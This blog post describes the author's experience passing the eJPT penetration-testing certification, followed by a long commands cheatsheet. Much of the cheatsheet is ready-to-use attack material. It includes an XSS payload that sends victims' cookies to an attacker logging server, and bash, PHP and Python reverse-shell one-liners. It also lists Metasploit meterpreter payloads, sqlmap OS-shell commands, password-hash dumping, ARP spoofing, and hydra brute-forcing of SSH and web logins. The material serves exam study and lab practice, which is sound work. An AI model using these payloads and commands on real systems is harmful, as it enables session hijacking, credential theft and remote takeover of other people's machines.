# How To Pass Your eJPT Exam

Hello hackers, Hope you are well !! 👋

Recently i have completed the [eLearnSecurity Junior Penetration Tester (eJPT) certification](https://verified.elearnsecurity.com/certificates/24880fdf-d97d-4180-92c5-8192618f0c0b), I’ve had a few people asked me about my experience, So i decided to write this post detailing the commands and techniques I used to pass. The hope is that this resource can be helpful to other student studying for this certification.

## <mark style="color:yellow;">**Introduction**</mark>

The [eLearnSecurity Junior Penetration Tester (eJPT)](https://elearnsecurity.com/product/ejpt-certification/) is a 100% practical certification on penetration testing and information security essentials. Bypassing the exam, a cybersecurity professional proves to employers they are ready for a rewarding new career.

* Cost: 200$ (exam voucher)
* Duration of exam: 72 Hours (3 days)
* Questions: 20 questions
* payment options: Paypal/credit card
* Material: (Lab, video, PDF)

### <mark style="color:yellow;">Prerequisites</mark>

Nothing, INE material is enough even non-technical people can understand easily, But i really recommend that you have:

* basic understanding of networking concepts
* Simple manual web application security assessment and exploitation
* Understanding of information gathering techniques
* Understanding of the penetration testing process

### <mark style="color:yellow;">Outcome</mark>

By obtaining the eJPT, your skills in the following areas will be assessed and certified:

* TCP/IP
* IP routing
* LAN protocols and devices
* HTTP and web technologies
* Essential penetration testing processes and methodologies
* Basic vulnerability assessment of networks
* Basic vulnerability assessment of web applications
* Exploitation with Metasploit
* Simple web application manual exploitation
* Basic information gathering and reconnaissance
* Simple scanning and profiling the target

### <mark style="color:yellow;">Course Sections</mark>

INE offer a free starter pass subscription that include many learning path and one of them is Penetration Testing Student (eJPT)

1. visit INE [starter-pass](https://checkout.ine.com/starter-pass) page
2. register you account
3. clam your PTS free course and start learning

eLearnSecurity divided the PTS course into three sections and modules, as can be seen below.

1- Preliminary Skills – Prerequisites

* Introduction
* Networking
* Web Applications
* Penetration Testing

2- Preliminary Skills – Programming

* Introduction
* C++
* Python
* Command Line Scripting

3- Penetration Testing

* Information Gathering
* Footprinting & Scanning
* Vulnerability Assessment
* Web Attacks
* System Attacks
* Network Attacks
* Next Steps

⭐ The eJPT exam doesn’t require you to go through the programming section to pass the exam so you can skip this part for now if you\`re planning to get more deeper in programming after this course.

eLearnSecurity packed the course with good information, but it’s showing its age. Don’t let that deter you from taking it because I really think they did a great job with the hands-on part of the course.

That brings me to the labs included with each module. Those labs are the meat and potatoes of the course. If you are a novice in the offensive security field, you will definitely learn a lot from it.

### <mark style="color:yellow;">Exam Format</mark>

You will be given 20 multiple-choice questions (MCQs), and you must properly answer 15 of them in order to pass the test. additionally, every question is based on practical. You can check the materials during the exam because this exam is open-book.

### <mark style="color:yellow;">Tools (For Exam)</mark>

OpenVPN, Nmap, Nessus, fping, dirt buster, burp suite, john the ripper, hashcat, Metasploit, hydra, Nmap, Wireshark, sublist3r, Netcat, dirb, enum4linux, samrdump, smbclient

### <mark style="color:yellow;">Tips for the exam</mark>

* complete course material with labs
* understand the concept of Pivoting( very important)
* in the exam go through the pentesting phase and connect all dots.
* Take notes for reference, Make new tabs in the terminal to do other tasks
* do not take stress it is a very easy exam. consider you are solving CTF.

### <mark style="color:yellow;">Final Thoughts</mark>

after taking eJPT certification one thing I can say it is one of the best exams I ever attended. and highly recommend it to every beginner who wants to start their journey in cybersecurity.

### <mark style="color:yellow;">Commands cheatsheet</mark>

#### nmap + fping

hosts discovery fping:

```
fping -a -g 10.10.10.0/24 2> fping.txt
```

hosts discovery nmap:

```
nmap -sn 10.10.10.0/24 > hosts.txt
nmap -sn -T4 10.10.30.0/24 -oG - | awk '/Up$/{print $2}'
```

open ports scan (save to file):

```
nmap -Pn -sV -T4 -A -oN ports.txt -p- -iL hosts.txt --open
```

UDP port scan:

```
nmap -sU -sV 10.10.10.0/24
```

nmap vuln scan example:

```
nmap --script vuln --script-args=unsafe=1 -iL hosts.txt
```

nmap SYN flood example:

```
watch -n 10 "nmap -e wlan0 -Pn -T5 -S 192.168.0.253 192.168.0.251"
```

#### masscan

masscan open only examples:

```
sudo masscan -p 21,22,80,8080,445,9200 --rate 64000 --wait 0 --open-only -oG masscan.gnmap 10.0.0.0/24
sudo masscan -iL hosts.list -p0-65535 --rate 64000 --open-only
```

#### httprint

httprint banner grabling:

```
httprint -P0 -s /usr/share/httprint/signatures.txt -h 10.10.10.15
```

#### route

add a route in kali/parrot:

```
ip route add 192.168.88.0/24 via 10.10.34.1
```

routing table:

```
netstat -rn
Kernel IP routing table
Destination      Gateway        Genmask         Flags   MSS Window  irtt Iface
...
192.168.88.0     10.10.34.1     255.255.255.0   UG        0 0          0 tap0
...
```

#### subdomains

discovery subdomain of a target by sublist3r:

```
sublist3r -d company.com
```

#### wireshark

filter by ip

```
ip.add == 10.10.10.9
```

filter by dest ip

```
ip.dest == 10.10.10.15
```

filter by source ip

```
ip.src == 10.10.16.33
```

filter by tcp port

```
tcp.port == 25
```

filter by ip addr and port

```
ip.addr == 10.10.14.22 and tcp.port == 8080
```

filter SYN flag

```
tcp.flags.syn == 1 and tcp.flags.ack ==0
```

broadcast filter

```
eth.dst == ff:ff:ff:ff:ff:ff
```

#### web app enum (gobuster)

```
nc -v 10.10.10.14 80
HEAD / HTTP/1.0

openssl s_client -connect 10.10.10.14:443

dirb http://10.10.10.123/
dirb https://10.10.10.5 /usr/share/dirb/wordlists/vulns/apache.txt
dirb https://192.168.16.33 /usr/share/dirb/wordlists/common.txt

gobuster dir -u http://10.10.10.160 -w /usr/share/wordlists/dirb/common.txt -t 16
```

#### web app enum (ffuf)

directory discovery:

```
ffuf -w wordlist.txt -u http://example.com/FUZZ
```

file discovery:

```
ffuf -w wordlist.txt -u http://example.com/FUZZ -e .aspx,.php,.txt,.html
```

output of responses with status code:

```
ffuf -w /usr/share/wordlists/dirb/small.txt -u http://example.com/FUZZ -mc 200,301
```

the -maxtime flag offers to end the ongoing fuzzing after the specified time in seconds:

```
ffuf -w wordlist.txt -u http://example.com/FUZZ -maxtime 60
```

number of threads:

```
ffuf -w wordlist.txt -u http://example.com/FUZZ -t 64
```

#### sqlmap

determine the databases:

```
sqlmap -u http://10.10.10.15/?id=4 --dbs
```

determine the tables:

```
sqlmap -u http://10.10.10.15/?id=4 -D dbname --tables
```

dump a table's data:

```
sqlmap -u http://10.10.10.15/?id=4 -D dbname -T table --dump
```

try to get os-shell:

```
sqlmap -u http://10.10.10.15/?id=4 --os-shell
```

#### xss

check example:

```
<script>alert("hack :)")</script>
```

**hijack cookie through xss**

there are four components as follows:

* attacker client pc
* attacker logging server
* vulnerable server
* victim client pc

1. attacker: first finds a vulnerable server and its breach point.
2. attacker: enter the following snippet in order to hijack the cookie kepts by victim client pc (p.s.: the ip address, 192.168.99.102, belongs to attacker logging server in this example):

```
<script>var i = new Image();i.src="http://192.168.99.102/log.php?q="+document.cookie;</script>
```

1. attacker: log into attacker logging server (P.S.: it is 192.168.99.102 in this example), and execute the following command:

```
nc -vv -k -l -p 80
```

1. attacker: when victim client pc browses the vulnerable server, check the output of the command above.
2. attacker: after obtaining the victim's cookie, utilize a firefox's add-on called Cookie Quick Manager to change to the victim's cookie in an effort to hijack the victim's privilege.

#### bruteforce (hydra, john, hashcat)

wordlist generation

```
cewl example.com -m 3 -w wordlist.txt
```

hydra http basic auth brute

```
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt example.com http-head /admin/
```

hydra brute http digest

```
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt example.com http-get /admin/
```

hydra brute http post form

```
hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed"
```

hydra brute http authenticated post form

```
hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed:H=Cookie\: PHPSESSID=if0kg4ss785kmov8bqlbusva3v"
```

hydra brute

```
hydra -f -v -V -L users.txt -P rockyou-15.txt -s 2223 -f ssh://10.10.10.17
hydra -v -V -l admin -P rockyou-10.txt ssh://10.10.10.18
```

combine passwd with shadow file for john the ripper:

```
unshadow passwd shadow > crack.hash
```

john the ripper bruteforce:

```
john -wordlist /usr/share/wordlists/rockyou.txt crack.hash
john -wordlist /usr/share/wordlists/rockyou.txt -users users.txt test.hash
```

hashcat:

```
hashcat -m 1000 -a 0 -o found.txt --remove crack.hash rockyou-10.txt
```

#### wpscan

```
wpscan --url http://10.10.10.14 --enumerate u
wpscan --url example.com -e vp --plugins-detection mixed --api-token API_TOKEN
wpscan --url example.com -e u --passwords /usr/share/wordlists/rockyou.txt
wpscan --url example.com -U admin -P /usr/share/wordlists/rockyou.txt
```

#### mysql

scan:

```
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.10.10.13
```

examples:

```
mysql -h 10.10.10.23 -P 13306 -u root -p -e "show databases;"
mysql -h 10.10.10.23 -P 13306 -u root -p -e "use mydb;show tables;"
mysql -h 10.10.10.23 -P 13306 -u root -p -e "use mydb;select * from users;"
```

#### msfconsole

search exploit

```
msf> search cve:2011 port:135 platform:windows target:XP
```

basic

```
msfconsole
use auxiliary/scanner/mssql/mssql_login
set rhosts 10.10.10.110
set rports 1433
set username admin
set password 12345
set verbose true
run
```

#### msfconsole examples

msssql enum

```
use auxiliary/scanner/mssql/mssql_enum
set username admin
set password 12345
set rhosts 10.10.10.177
set rport 1433
run
```

mssql payload

```
use exploit/windows/mssql/mssql_payload
set rhosts 10.10.10.177
set rport 1433
set srvport 53
set username admin
set password qwerty
set payload windows/x64/meterpreter_reverse_tcp
```

ssh login enum (brute)

```
use auxiliary/scanner/ssh/ssh_login
show options
set rhosts 10.10.10.133
set user_file /usr/share/ncrack/minimal.usr
set pass_file /usr/share/ncrack/minimal.usr
set verbose true
run
```

eternal blue example:

```
use exploit/windows/smb/ms17_010_eternalblue
show options
set payload windows/x64/meterpreter/reverse_tcp
```

#### meterpreter

```
meterpreter>run autoroute -s 172.16.50.0/24
background

sessions -l
sessions -i 1

sysinfo, ifconfig, route, getuid
getsystem (privesc)
bypassuac

download x /root/
upload x C:\\Windows
shell

use post/windows/gather/hashdump
```

#### windows shares with null sessions

enumeration with kali/parrot tools:

```
nmblookup -A 10.16.64.223
smbclient -L //10.16.64.223 -N share
smbclient //10.16.64.223/share -N mount

enum4linux -a 10.10.10.13
```

enumeration with nmap:

```
ll /usr/share/nmap/scripts/ | grep smb-enum-
-rw-r--r-- 1 root root  4846 Jan  9  2019 smb-enum-domains.nse
-rw-r--r-- 1 root root  5931 Jan  9  2019 smb-enum-groups.nse
-rw-r--r-- 1 root root  8045 Jan  9  2019 smb-enum-processes.nse
-rw-r--r-- 1 root root 27262 Jan  9  2019 smb-enum-services.nse
-rw-r--r-- 1 root root 12057 Jan  9  2019 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6923 Jan  9  2019 smb-enum-shares.nse
-rw-r--r-- 1 root root 12531 Jan  9  2019 smb-enum-users.nse

nmap --script=smb-enum-users 192.168.1.10
```

**null sessions**

1. Use "enum4linux -n" to make sure if "<20>" exists:

```
enum4linux -n 192.168.1.10
```

1. If "<20>" exists, it means Null Session could be exploited. Utilize the following command to get more details:

```
enum4linux 192.168.1.10
```

1. If confirmed that Null Session exists, you can remotely list all share of the target:

```
smbclient -L WORKGROUP -I 192.168.1.10 -N -U ""
```

1. You also can connect the remote server by applying the following command:

```
smbclient \\\\192.168.1.10\\c$ -N -U ""
```

1. Download those files stored on the share drive:

```
smb: \> get Congratulations.txt
```

#### ARP spoofing

```
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i tap0 -t 10.13.37.100 -r 10.13.37.101
```

#### reverse shell

bash

```
bash -i >& /dev/tcp/10.0.14.22/4444 0>&1
```

php one line (bash)

```
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.14.10/4444 0>&1'"); ?>
```

python

```
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.14.22",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")
```

> Thanks For Reading

<table><thead><tr><th align="center">    Follow Me</th><th data-hidden></th><th data-hidden></th></tr></thead><tbody><tr><td align="center"><a href="https://www.facebook.com/StrikerHacker33/"><mark style="color:blue;"><strong>Facebook</strong></mark></a></td><td></td><td></td></tr><tr><td align="center"><a href="https://www.linkedin.com/in/eslam-kamal/"><mark style="color:blue;"><strong>LinkedIn</strong></mark></a></td><td></td><td></td></tr><tr><td align="center"><a href="https://twitter.com/xxEslam_Kamalxx"><mark style="color:blue;"><strong>Twitter</strong></mark></a></td><td></td><td></td></tr></tbody></table>